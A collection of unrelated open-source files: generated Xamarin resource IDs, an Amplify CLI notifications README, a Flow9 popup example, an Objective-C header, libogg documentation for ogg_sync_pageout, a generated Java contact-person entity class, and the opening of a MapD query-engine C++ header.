			global::Xamarin.Android.NUnitLite.Resource.Id.OptionRemoteServer = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionRemoteServer;
			global::Xamarin.Android.NUnitLite.Resource.Id.OptionsButton = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionsButton;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultFullName = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultFullName;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultMessage = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultMessage;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultResultState = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultResultState;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultRunSingleMethodTest = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultRunSingleMethodTest;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultStackTrace = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultStackTrace;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsFailed = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsFailed;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsId = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsId;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsIgnored = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsIgnored;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsInconclusive = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsInconclusive;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsMessage = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsMessage;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsPassed = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsPassed;
			global::Xamarin.Android.NUnitLite.Resource.Id.ResultsResult = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsResult;
			global::Xamarin.Android.NUnitLite.Resource.Id.RunTestsButton = global::GalaSoft.MvvmLight.Test.Resource.Id.RunTestsButton;
			global::Xamarin.Android.NUnitLite.Resource.Id.TestSuiteListView = global::GalaSoft.MvvmLight.Test.Resource.Id.TestSuiteListView;
			global::Xamarin.Android.NUnitLite.Resource.Layout.options = global::GalaSoft.MvvmLight.Test.Resource.Layout.options;
			global::Xamarin.Android.NUnitLite.Resource.Layout.results = global::GalaSoft.MvvmLight.Test.Resource.Layout.results;
			global::Xamarin.Android.NUnitLite.Resource.Layout.test_result = global::GalaSoft.MvvmLight.Test.Resource.Layout.test_result;
			global::Xamarin.Android.NUnitLite.Resource.Layout.test_suite = global::GalaSoft.MvvmLight.Test.Resource.Layout.test_suite;
		}
		public partial class Attribute
		{
			// aapt resource value: 0x7f010000
			public const int layoutManager = 2130771968;
			// aapt resource value: 0x7f010002
			public const int reverseLayout = 2130771970;
			// aapt resource value: 0x7f010001
			public const int spanCount = 2130771969;
			// aapt resource value: 0x7f010003
			public const int stackFromEnd = 2130771971;
			static Attribute()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Attribute()
			{
			}
		}
		public partial class Dimension
		{
			// aapt resource value: 0x7f040000
			public const int item_touch_helper_max_drag_scroll_per_frame = 2130968576;
			// aapt resource value: 0x7f040001
			public const int item_touch_helper_swipe_escape_max_velocity = 2130968577;
			// aapt resource value: 0x7f040002
			public const int item_touch_helper_swipe_escape_velocity = 2130968578;
			static Dimension()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Dimension()
			{
			}
		}
		public partial class Drawable
		{
			// aapt resource value: 0x7f020000
			public const int Icon = 2130837504;
			static Drawable()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Drawable()
			{
			}
		}
		public partial class Id
		{
			// aapt resource value: 0x7f050002
			public const int OptionHostName = 2131034114;
			// aapt resource value: 0x7f050003
			public const int OptionPort = 2131034115;
			// aapt resource value: 0x7f050001
			public const int OptionRemoteServer = 2131034113;
			// aapt resource value: 0x7f050011
			public const int OptionsButton = 2131034129;
			// aapt resource value: 0x7f05000c
			public const int ResultFullName = 2131034124;
			// aapt resource value: 0x7f05000e
			public const int ResultMessage = 2131034126;
			// aapt resource value: 0x7f05000d
			public const int ResultResultState = 2131034125;
			// aapt resource value: 0x7f05000b
			public const int ResultRunSingleMethodTest = 2131034123;
			// aapt resource value: 0x7f05000f
			public const int ResultStackTrace = 2131034127;
			// aapt resource value: 0x7f050007
			public const int ResultsFailed = 2131034119;
			// aapt resource value: 0x7f050004
			public const int ResultsId = 2131034116;
			// aapt resource value: 0x7f050008
			public const int ResultsIgnored = 2131034120;
			// aapt resource value: 0x7f050009
			public const int ResultsInconclusive = 2131034121;
			// aapt resource value: 0x7f05000a
			public const int ResultsMessage = 2131034122;
			// aapt resource value: 0x7f050006
			public const int ResultsPassed = 2131034118;
			// aapt resource value: 0x7f050005
			public const int ResultsResult = 2131034117;
			// aapt resource value: 0x7f050010
			public const int RunTestsButton = 2131034128;
			// aapt resource value: 0x7f050012
			public const int TestSuiteListView = 2131034130;
			// aapt resource value: 0x7f050000
			public const int item_touch_helper_previous_elevation = 2131034112;
			static Id()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Id()
			{
			}
		}
		public partial class Layout
		{
			// aapt resource value: 0x7f030000
			public const int options = 2130903040;
			// aapt resource value: 0x7f030001
			public const int results = 2130903041;
			// aapt resource value: 0x7f030002
			public const int test_result = 2130903042;
			// aapt resource value: 0x7f030003
			public const int test_suite = 2130903043;
			static Layout()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Layout()
			{
			}
		}
		public partial class String
		{
			// aapt resource value: 0x7f060001
			public const int ApplicationName = 2131099649;
			// aapt resource value: 0x7f060000
			public const int Hello = 2131099648;
			static String()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private String()
			{
			}
		}
		public partial class Styleable
		{
			public static int[] RecyclerView = new int[] {
				16842948,
				2130771968,
				2130771969,
				2130771970,
				2130771971};
			// aapt resource value: 0
			public const int RecyclerView_android_orientation = 0;
			// aapt resource value: 1
			public const int RecyclerView_layoutManager = 1;
			// aapt resource value: 3
			public const int RecyclerView_reverseLayout = 3;
			// aapt resource value: 2
			public const int RecyclerView_spanCount = 2;
			// aapt resource value: 4
			public const int RecyclerView_stackFromEnd = 4;
			static Styleable()
			{
				global::Android.Runtime.ResourceIdManager.UpdateIdValues();
			}
			private Styleable()
			{
			}
		}
	}
}
#pragma warning restore 1591
| {
"pile_set_name": "Github"
} |
# Amplify CLI Notifications Plugin
## Commands Summary
The Amplify Notifications Category Plugin supports the commands listed in the following table.
| Command | Description |
| --- | --- |
| amplify notifications add | Adds a notification channel. |
| amplify notifications remove | Removes a notification channel. |
| amplify notifications update | Configures a notification channel. |
| amplify notifications status | Lists the enabled/disabled statuses of the available notification channels. |
| amplify notifications console | Opens the Amazon Pinpoint console displaying the current channel settings. |
| {
"pile_set_name": "Github"
} |
import material/material2tropic;
main () {
	// Build 100 rows; each row shows its index and a "menu" icon button that
	// opens a popup (a text input plus an "add" icon) anchored at the button.
	content =
		enumFromTo(1, 100)
		|> (\xs -> map(xs, \x -> {
			// Position/scale behaviour fed by MPositionScale below so the popup
			// opens where this row's icon button was rendered.
			ps = make(PositionScale(Point(0.0, 0.0), Point(0.0, 0.0)));
			// Curried: capture the manager/focus-parent/m2t context, return the
			// zero-arg click handler that renders the popup.
			openPopup = \manager, parent, m2t -> \ -> {
				popup =
					MPopup(
						[[MCols([MTextInput(make(""), [MWidth(320.0)], []), MIconButton("add", nop, [], [])])]],
						ps,
						[RMClickOutToClose()]
					);
				RenderMPopup(manager, parent, popup, m2t);
			}
			MCols([
				MText(i2s(x), []),
				MGetManager(\manager -> MGetFocusGroup(\parent -> MGetMaterial2Tropic(\m2t ->
					MPositionScale(ps, MIconButton("menu", openPopup(manager, parent, m2t), [], []))
				)))
			])
		}))
		|> MLines
		|> (\m -> MScroll(m, TFillXY(), []));
	// Render the scrollable list with a fresh material manager.
	mrender(makeMaterialManager([]), true, content);
} | {
"pile_set_name": "Github"
} |
// Copyright 2013 Viewfinder. All rights reserved.
// Author: Peter Mattis.
#import <QuartzCore/QuartzCore.h>
// Creates a mutable CGPath describing a chevron glyph scaled by `size`.
// NOTE(review): ownership is not documented here — presumably the caller
// owns the returned path and must CGPathRelease it; confirm against the
// implementation.
CGMutablePathRef MakeChevronPath(float size);
// local variables:
// mode: objc
// end:
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>libogg - function - ogg_sync_pageout</title>
<link rel=stylesheet href="style.css" type="text/css">
</head>
<body bgcolor=white text=black link="#5555ff" alink="#5555ff" vlink="#5555ff">
<table border=0 width=100%>
<tr>
<td><p class=tiny>libogg documentation</p></td>
<td align=right><p class=tiny>libogg release 1.3.2 - 20140527</p></td>
</tr>
</table>
<h1>ogg_sync_pageout</h1>
<p><i>declared in "ogg/ogg.h";</i></p>
<p>This function takes the data stored in the buffer of the <a href="ogg_sync_state.html">ogg_sync_state</a> struct and inserts them into an <a href="ogg_page.html">ogg_page</a>.
<p>In an actual decoding loop, this function should be called first to ensure that the buffer is cleared. The example code below illustrates a clean reading loop which will fill and output pages.
<p><b>Caution:</b>This function should be called before reading into the buffer to ensure that data does not remain in the ogg_sync_state struct. Failing to do so may result in a memory leak. See the example code below for details.
<br><br>
<table border=0 color=black cellspacing=0 cellpadding=7>
<tr bgcolor=#cccccc>
<td>
<pre><b>
int ogg_sync_pageout(<a href="ogg_sync_state.html">ogg_sync_state</a> *oy, <a href="ogg_page.html">ogg_page</a> *og);
</b></pre>
</td>
</tr>
</table>
<h3>Parameters</h3>
<dl>
<dt><i>oy</i></dt>
<dd>Pointer to a previously declared <a href="ogg_sync_state.html">ogg_sync_state</a> struct. Normally, the internal storage of this struct should be filled with newly read data and verified using <a href="ogg_sync_wrote.html">ogg_sync_wrote</a>.</dd>
<dt><i>og</i></dt>
<dd>Pointer to page struct filled by this function.
</dl>
<h3>Return Values</h3>
<blockquote>
<li>-1 returned if the stream has not yet captured sync (bytes were skipped).</li>
<li>0 returned if more data is needed or an internal error occurred.</li>
<li>1 returned if a page was synced and written into the provided page struct.</li>
</blockquote>
<p>
<h3>Example Usage</h3>
<pre>
if (ogg_sync_pageout(&oy, &og) != 1) {
buffer = ogg_sync_buffer(&oy, 8192);
bytes = fread(buffer, 1, 8192, stdin);
ogg_sync_wrote(&oy, bytes);
}
</pre>
<br><br>
<hr noshade>
<table border=0 width=100%>
<tr valign=top>
<td><p class=tiny>copyright © 2000-2014 Xiph.Org</p></td>
<td align=right><p class=tiny><a href="http://www.xiph.org/ogg/">Ogg Container Format</a></p></td>
</tr><tr>
<td><p class=tiny>libogg documentation</p></td>
<td align=right><p class=tiny>libogg release 1.3.2 - 20140527</p></td>
</tr>
</table>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package com.doublechaintech.retailscm.potentialcustomercontactperson;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Optional;
import java.util.stream.Collectors;
import java.math.BigDecimal;
import com.terapico.caf.DateTime;
import com.terapico.caf.Images;
import com.doublechaintech.retailscm.BaseEntity;
import com.doublechaintech.retailscm.SmartList;
import com.doublechaintech.retailscm.KeyValuePair;
import com.fasterxml.jackson.databind.annotation.JsonSerialize;
import com.doublechaintech.retailscm.potentialcustomercontact.PotentialCustomerContact;
import com.doublechaintech.retailscm.potentialcustomer.PotentialCustomer;
@JsonSerialize(using = PotentialCustomerContactPersonSerializer.class)
public class PotentialCustomerContactPerson extends BaseEntity implements java.io.Serializable{
	// Property-name constants used by the generic changeProperty/propertyOf
	// reflection-style accessors further down in this class.
	public static final String ID_PROPERTY = "id" ;
	public static final String NAME_PROPERTY = "name" ;
	public static final String MOBILE_PROPERTY = "mobile" ;
	public static final String POTENTIAL_CUSTOMER_PROPERTY = "potentialCustomer" ;
	public static final String DESCRIPTION_PROPERTY = "description" ;
	public static final String VERSION_PROPERTY = "version" ;
	public static final String POTENTIAL_CUSTOMER_CONTACT_LIST = "potentialCustomerContactList";
	public static final String INTERNAL_TYPE="PotentialCustomerContactPerson";
	// Type discriminator reported to the framework (serialization/dispatch).
	public String getInternalType(){
		return INTERNAL_TYPE;
	}
	// Human-readable label: the contact person's name when set, otherwise the
	// BaseEntity default.
	public String getDisplayName(){
		String displayName = getName();
		if(displayName!=null){
			return displayName;
		}
		return super.getDisplayName();
	}
	private static final long serialVersionUID = 1L;
	// Backing fields; all access goes through the accessors below.
	protected String mId ;
	protected String mName ;
	protected String mMobile ;
	protected PotentialCustomer mPotentialCustomer ;
	protected String mDescription ;
	protected int mVersion ;
	protected SmartList<PotentialCustomerContact> mPotentialCustomerContactList;
	// No-arg constructor: properties are populated lazily by the data layer.
	public PotentialCustomerContactPerson(){
		// lazy load for all the properties
	}
	// Build a detached reference carrying only an id. Version is set to
	// Integer.MAX_VALUE — presumably so version checks treat it as newest;
	// confirm against BaseEntity's versioning rules.
	public static PotentialCustomerContactPerson withId(String id){
		PotentialCustomerContactPerson potentialCustomerContactPerson = new PotentialCustomerContactPerson();
		potentialCustomerContactPerson.setId(id);
		potentialCustomerContactPerson.setVersion(Integer.MAX_VALUE);
		return potentialCustomerContactPerson;
	}
	public static PotentialCustomerContactPerson refById(String id){
		return withId(id);
	}
	// Disconnect from all related objects — sever every reference so the
	// record stands alone in the data store (translated from the original
	// Chinese comment), then mark the entity dirty.
	public void clearFromAll(){
		setPotentialCustomer( null );
		this.changed = true;
	}
	//Support for changing the property
	// Generic mutator: routes `newValueExpr` to the matching change*Property
	// handler. Property names not listed here are silently ignored.
	public void changeProperty(String property, String newValueExpr) {
		if(NAME_PROPERTY.equals(property)){
			changeNameProperty(newValueExpr);
		}
		if(MOBILE_PROPERTY.equals(property)){
			changeMobileProperty(newValueExpr);
		}
		if(DESCRIPTION_PROPERTY.equals(property)){
			changeDescriptionProperty(newValueExpr);
		}
	}
	// The three change*Property helpers share one pattern: parse the incoming
	// expression, no-op when the value is unchanged, otherwise update the
	// field and notify onChangeProperty with the old/new pair.
	protected void changeNameProperty(String newValueExpr){
		String oldValue = getName();
		String newValue = parseString(newValueExpr);
		if(equalsString(oldValue , newValue)){
			return;//they can be both null, or exact the same object, this is much faster than equals function
		}
		//they are surely different each other
		updateName(newValue);
		this.onChangeProperty(NAME_PROPERTY, oldValue, newValue);
		return;
	}
	protected void changeMobileProperty(String newValueExpr){
		String oldValue = getMobile();
		String newValue = parseString(newValueExpr);
		if(equalsString(oldValue , newValue)){
			return;//they can be both null, or exact the same object, this is much faster than equals function
		}
		//they are surely different each other
		updateMobile(newValue);
		this.onChangeProperty(MOBILE_PROPERTY, oldValue, newValue);
		return;
	}
	protected void changeDescriptionProperty(String newValueExpr){
		String oldValue = getDescription();
		String newValue = parseString(newValueExpr);
		if(equalsString(oldValue , newValue)){
			return;//they can be both null, or exact the same object, this is much faster than equals function
		}
		//they are surely different each other
		updateDescription(newValue);
		this.onChangeProperty(DESCRIPTION_PROPERTY, oldValue, newValue);
		return;
	}
	// Generic reader mirroring changeProperty. Unknown names fall through to
	// BaseEntity.propertyOf.
	public Object propertyOf(String property) {
		if(NAME_PROPERTY.equals(property)){
			return getName();
		}
		if(MOBILE_PROPERTY.equals(property)){
			return getMobile();
		}
		if(POTENTIAL_CUSTOMER_PROPERTY.equals(property)){
			return getPotentialCustomer();
		}
		if(DESCRIPTION_PROPERTY.equals(property)){
			return getDescription();
		}
		if(POTENTIAL_CUSTOMER_CONTACT_LIST.equals(property)){
			// Copy the contact list into a plain List<BaseEntity> view.
			List<BaseEntity> list = getPotentialCustomerContactList().stream().map(item->item).collect(Collectors.toList());
			return list;
		}
		//other property not include here
		return super.propertyOf(property);
	}
/** Sets the id, trimming surrounding whitespace; does not mark the entity changed. */
public void setId(String id) {
    this.mId = trimString(id);  // stray duplicate semicolon removed
}
/** Returns the trimmed id. */
public String getId() {
    return this.mId;
}
/** Sets the id and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updateId(String id) {
    this.mId = trimString(id);
    this.changed = true;
    return this;
}
/** Applies the id only when non-null (merge semantics). */
public void mergeId(String id) {
    if (id != null) { setId(id); }
}
/** Sets the name, trimming surrounding whitespace; does not mark the entity changed. */
public void setName(String name) {
    this.mName = trimString(name);  // stray duplicate semicolon removed
}
/** Returns the trimmed name. */
public String getName() {
    return this.mName;
}
/** Sets the name and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updateName(String name) {
    this.mName = trimString(name);
    this.changed = true;
    return this;
}
/** Applies the name only when non-null (merge semantics). */
public void mergeName(String name) {
    if (name != null) { setName(name); }
}
/** Sets the mobile number, trimming surrounding whitespace; does not mark the entity changed. */
public void setMobile(String mobile) {
    this.mMobile = trimString(mobile);  // stray duplicate semicolon removed
}
/** Returns the trimmed mobile number. */
public String getMobile() {
    return this.mMobile;
}
/** Sets the mobile number and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updateMobile(String mobile) {
    this.mMobile = trimString(mobile);
    this.changed = true;
    return this;
}
/** Applies the mobile number only when non-null (merge semantics). */
public void mergeMobile(String mobile) {
    if (mobile != null) { setMobile(mobile); }
}
/** Returns the mobile number masked via maskChinaMobileNumber, for safe display. */
public String getMaskedMobile(){
    String mobilePhoneNumber = getMobile();
    return maskChinaMobileNumber(mobilePhoneNumber);
}
/** Sets the owning potential customer reference; does not mark the entity changed. */
public void setPotentialCustomer(PotentialCustomer potentialCustomer) {
    this.mPotentialCustomer = potentialCustomer;  // stray duplicate semicolon removed
}
/** Returns the owning potential customer, possibly null. */
public PotentialCustomer getPotentialCustomer() {
    return this.mPotentialCustomer;
}
/** Sets the potential customer and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updatePotentialCustomer(PotentialCustomer potentialCustomer) {
    this.mPotentialCustomer = potentialCustomer;
    this.changed = true;
    return this;
}
/** Applies the potential customer only when non-null (merge semantics). */
public void mergePotentialCustomer(PotentialCustomer potentialCustomer) {
    if (potentialCustomer != null) { setPotentialCustomer(potentialCustomer); }
}
/** Clears the potential customer reference and marks this entity changed. */
public void clearPotentialCustomer() {
    setPotentialCustomer(null);
    this.changed = true;
}
/** Sets the description, trimming surrounding whitespace; does not mark the entity changed. */
public void setDescription(String description) {
    this.mDescription = trimString(description);  // stray duplicate semicolon removed
}
/** Returns the trimmed description. */
public String getDescription() {
    return this.mDescription;
}
/** Sets the description and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updateDescription(String description) {
    this.mDescription = trimString(description);
    this.changed = true;
    return this;
}
/** Applies the description only when non-null (merge semantics). */
public void mergeDescription(String description) {
    if (description != null) { setDescription(description); }
}
/** Sets the version number; does not mark the entity changed. */
public void setVersion(int version) {
    this.mVersion = version;  // stray duplicate semicolon removed
}
/** Returns the version number. */
public int getVersion() {
    return this.mVersion;
}
/** Sets the version and marks this entity changed; returns this for chaining. */
public PotentialCustomerContactPerson updateVersion(int version) {
    this.mVersion = version;
    this.changed = true;
    return this;
}
/** Always applies the version: it is a primitive int, so there is no null to skip. */
public void mergeVersion(int version) {
    setVersion(version);
}
/**
 * Lazily creates the contact list on first access; the list carries an
 * internal name so the framework can apply per-list permission control.
 */
public SmartList<PotentialCustomerContact> getPotentialCustomerContactList(){
    if(this.mPotentialCustomerContactList == null){
        this.mPotentialCustomerContactList = new SmartList<PotentialCustomerContact>();
        this.mPotentialCustomerContactList.setListInternalName (POTENTIAL_CUSTOMER_CONTACT_LIST );
        //the list has a name, which makes permission control easier
    }
    return this.mPotentialCustomerContactList;
}
/** Replaces the whole contact list, re-pointing each element's ContactTo back reference to this person. */
public void setPotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList){
    for( PotentialCustomerContact potentialCustomerContact:potentialCustomerContactList){
        potentialCustomerContact.setContactTo(this);
    }
    this.mPotentialCustomerContactList = potentialCustomerContactList;
    this.mPotentialCustomerContactList.setListInternalName (POTENTIAL_CUSTOMER_CONTACT_LIST );
}
/** Adds a single contact, wiring its ContactTo back reference to this person. */
public void addPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
    potentialCustomerContact.setContactTo(this);
    getPotentialCustomerContactList().add(potentialCustomerContact);
}
/** Adds all given contacts, wiring each one's ContactTo back reference to this person. */
public void addPotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList){
    for( PotentialCustomerContact potentialCustomerContact:potentialCustomerContactList){
        potentialCustomerContact.setContactTo(this);
    }
    getPotentialCustomerContactList().addAll(potentialCustomerContactList);
}
/** Merge-adds the given contacts; a null or empty incoming list is a no-op. */
public void mergePotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList) {
    if (potentialCustomerContactList == null || potentialCustomerContactList.isEmpty()) {
        return;
    }
    addPotentialCustomerContactList(potentialCustomerContactList);
}
/**
 * Plans removal of the list element matching the given contact (same id and
 * version): disconnects it from all relations and marks it for removal.
 *
 * @return the disconnected list element
 * @throws IllegalStateException when no matching element exists or the
 *         removal cannot be planned
 */
public PotentialCustomerContact removePotentialCustomerContact(PotentialCustomerContact potentialCustomerContactIndex) {
    int index = getPotentialCustomerContactList().indexOf(potentialCustomerContactIndex);
    if (index < 0) {
        throw new IllegalStateException(contactNotFoundMessage(potentialCustomerContactIndex));
    }
    PotentialCustomerContact potentialCustomerContact = getPotentialCustomerContactList().get(index);
    // potentialCustomerContact.clearContactTo(); //disconnect with ContactTo
    potentialCustomerContact.clearFromAll(); //disconnect with ContactTo
    boolean result = getPotentialCustomerContactList().planToRemove(potentialCustomerContact);
    if (!result) {
        throw new IllegalStateException(contactNotFoundMessage(potentialCustomerContactIndex));
    }
    return potentialCustomerContact;
}
/** Builds the standard "not found" message; extracted to avoid duplicated string construction. */
private String contactNotFoundMessage(PotentialCustomerContact contact) {
    return "PotentialCustomerContact("+contact.getId()+") with version='"+contact.getVersion()+"' NOT found!";
}
//break the relationship: detach the child from this parent
public void breakWithPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
    if(potentialCustomerContact == null){
        return;
    }
    potentialCustomerContact.setContactTo(null);
    //getPotentialCustomerContactList().remove();
}
/** Returns true when the given contact is present in this person's contact list. */
public boolean hasPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
    return getPotentialCustomerContactList().contains(potentialCustomerContact);
}
/** Duplicates an existing contact (version reset to 0 to trigger a copy) and records it as a copied child. */
public void copyPotentialCustomerContactFrom(PotentialCustomerContact potentialCustomerContact) {
    PotentialCustomerContact potentialCustomerContactInList = findThePotentialCustomerContact(potentialCustomerContact);
    PotentialCustomerContact newPotentialCustomerContact = new PotentialCustomerContact();
    potentialCustomerContactInList.copyTo(newPotentialCustomerContact);
    newPotentialCustomerContact.setVersion(0);//will trigger copy
    getPotentialCustomerContactList().add(newPotentialCustomerContact);
    addItemToFlexiableObject(COPIED_CHILD, newPotentialCustomerContact);
}
/** Finds the list element equal to the given contact, or throws IllegalStateException. */
public PotentialCustomerContact findThePotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
    int index = getPotentialCustomerContactList().indexOf(potentialCustomerContact);
    //The input parameter must have the same id and version number.
    if(index < 0){
        String message = "PotentialCustomerContact("+potentialCustomerContact.getId()+") with version='"+potentialCustomerContact.getVersion()+"' NOT found!";
        throw new IllegalStateException(message);
    }
    return getPotentialCustomerContactList().get(index);
    //Performance issue when using LinkedList, but it is almost an ArrayList for sure!
}
/** Removes every element from the contact list. */
public void cleanUpPotentialCustomerContactList(){
    getPotentialCustomerContactList().clear();
}
/** Collects single-reference targets (the potential customer) into entityList. */
public void collectRefercences(BaseEntity owner, List<BaseEntity> entityList, String internalType){
    addToEntityList(this, entityList, getPotentialCustomer(), internalType);
}
/** Collects references reachable through child lists. (Method-name typo kept for interface compatibility.) */
public List<BaseEntity> collectRefercencesFromLists(String internalType){
    List<BaseEntity> entityList = new ArrayList<BaseEntity>();
    collectFromList(this, entityList, getPotentialCustomerContactList(), internalType);
    return entityList;
}
/** Returns all child lists owned by this entity. */
public List<SmartList<?>> getAllRelatedLists() {
    List<SmartList<?>> listOfList = new ArrayList<SmartList<?>>();
    listOfList.add( getPotentialCustomerContactList());
    return listOfList;
}
/**
 * Serializes this entity into ordered key/value pairs. The mobile number is
 * emitted masked; list paging metadata is appended only when the contact list
 * is non-empty; a "valuesOfGroupBy" entry is appended when present.
 */
public List<KeyValuePair> keyValuePairOf(){
    List<KeyValuePair> result = super.keyValuePairOf();
    appendKeyValuePair(result, ID_PROPERTY, getId());
    appendKeyValuePair(result, NAME_PROPERTY, getName());
    appendKeyValuePair(result, MOBILE_PROPERTY, getMaskedMobile());
    appendKeyValuePair(result, POTENTIAL_CUSTOMER_PROPERTY, getPotentialCustomer());
    appendKeyValuePair(result, DESCRIPTION_PROPERTY, getDescription());
    appendKeyValuePair(result, VERSION_PROPERTY, getVersion());
    appendKeyValuePair(result, POTENTIAL_CUSTOMER_CONTACT_LIST, getPotentialCustomerContactList());
    if(!getPotentialCustomerContactList().isEmpty()){
        appendKeyValuePair(result, "potentialCustomerContactCount", getPotentialCustomerContactList().getTotalCount());
        appendKeyValuePair(result, "potentialCustomerContactCurrentPageNumber", getPotentialCustomerContactList().getCurrentPageNumber());
    }
    if (this.valueByKey("valuesOfGroupBy") != null) {
        appendKeyValuePair(result, "valuesOfGroupBy", this.valueByKey("valuesOfGroupBy"));
    }
    return result;
}
/** Copies every field (including the child list) onto the destination when it is a PotentialCustomerContactPerson. */
public BaseEntity copyTo(BaseEntity baseDest){
    if(baseDest instanceof PotentialCustomerContactPerson){
        PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
        dest.setId(getId());
        dest.setName(getName());
        dest.setMobile(getMobile());
        dest.setPotentialCustomer(getPotentialCustomer());
        dest.setDescription(getDescription());
        dest.setVersion(getVersion());
        dest.setPotentialCustomerContactList(getPotentialCustomerContactList());
    }
    super.copyTo(baseDest);
    return baseDest;
}
/** Merges every field (non-null semantics per mergeX methods) onto the destination. */
public BaseEntity mergeDataTo(BaseEntity baseDest){
    if(baseDest instanceof PotentialCustomerContactPerson){
        PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
        dest.mergeId(getId());
        dest.mergeName(getName());
        dest.mergeMobile(getMobile());
        dest.mergePotentialCustomer(getPotentialCustomer());
        dest.mergeDescription(getDescription());
        dest.mergeVersion(getVersion());
        dest.mergePotentialCustomerContactList(getPotentialCustomerContactList());
    }
    // NOTE(review): calls super.copyTo rather than super.mergeDataTo -- looks
    // copy-pasted from copyTo above; confirm against BaseEntity before changing.
    super.copyTo(baseDest);
    return baseDest;
}
/** Merges only the simple scalar fields (no references, no child lists) onto the destination. */
public BaseEntity mergePrimitiveDataTo(BaseEntity baseDest){
    if(baseDest instanceof PotentialCustomerContactPerson){
        PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
        dest.mergeId(getId());
        dest.mergeName(getName());
        dest.mergeMobile(getMobile());
        dest.mergeDescription(getDescription());
        dest.mergeVersion(getVersion());
    }
    return baseDest;
}
/** Returns the scalar fields as a flat array: id, name, mobile, potentialCustomer, description, version. */
public Object[] toFlatArray(){
    return new Object[]{getId(), getName(), getMobile(), getPotentialCustomer(), getDescription(), getVersion()};
}
/** Renders a compact single-line debug representation of this entity. */
public String toString() {
    StringBuilder sb = new StringBuilder(128);
    sb.append("PotentialCustomerContactPerson{");
    sb.append("\tid='").append(getId()).append("';");
    sb.append("\tname='").append(getName()).append("';");
    sb.append("\tmobile='").append(getMobile()).append("';");
    if (getPotentialCustomer() != null) {
        sb.append("\tpotentialCustomer='PotentialCustomer(").append(getPotentialCustomer().getId()).append(")';");
    }
    sb.append("\tdescription='").append(getDescription()).append("';");
    sb.append("\tversion='").append(getVersion()).append("';");
    sb.append("}");
    return sb.toString();
}
//provide number calculation function
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017 MapD Technologies, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @file SqlTypesLayout.h
* @author Alex Suhan <[email protected]>
*/
#ifndef QUERYENGINE_SQLTYPESLAYOUT_H
#define QUERYENGINE_SQLTYPESLAYOUT_H
#include "../Shared/TargetInfo.h"
#include "Logger/Logger.h"
#include <limits>
// Thrown when a checked arithmetic operation exceeds the target type's range.
class OverflowOrUnderflow : public std::runtime_error {
 public:
  OverflowOrUnderflow() : std::runtime_error("Overflow or underflow") {}
};

// Returns the type a target is materialized with. Non-aggregates use their own
// SQL type (element type for column types). For aggregates: the argument type
// when the aggregate's domain equals its range; COUNT with no argument keeps
// the target type; otherwise the target type with nullability forced to match
// the aggregate argument's.
inline const SQLTypeInfo get_compact_type(const TargetInfo& target) {
  if (!target.is_agg) {
    return (target.sql_type.is_column() ? target.sql_type.get_elem_type()
                                        : target.sql_type);
  }
  const auto agg_type = target.agg_kind;
  const auto& agg_arg = target.agg_arg_type;
  if (agg_arg.get_type() == kNULLT) {
    // A NULL-typed aggregate argument is only expected for non-distinct COUNT.
    CHECK_EQ(kCOUNT, agg_type);
    CHECK(!target.is_distinct);
    return target.sql_type;
  }
  if (is_agg_domain_range_equivalent(agg_type)) {
    return agg_arg;
  } else {
    // Nullability of the target needs to match that of the agg for proper initialization
    // of target (aggregate) values
    auto modified_target_type = target.sql_type;
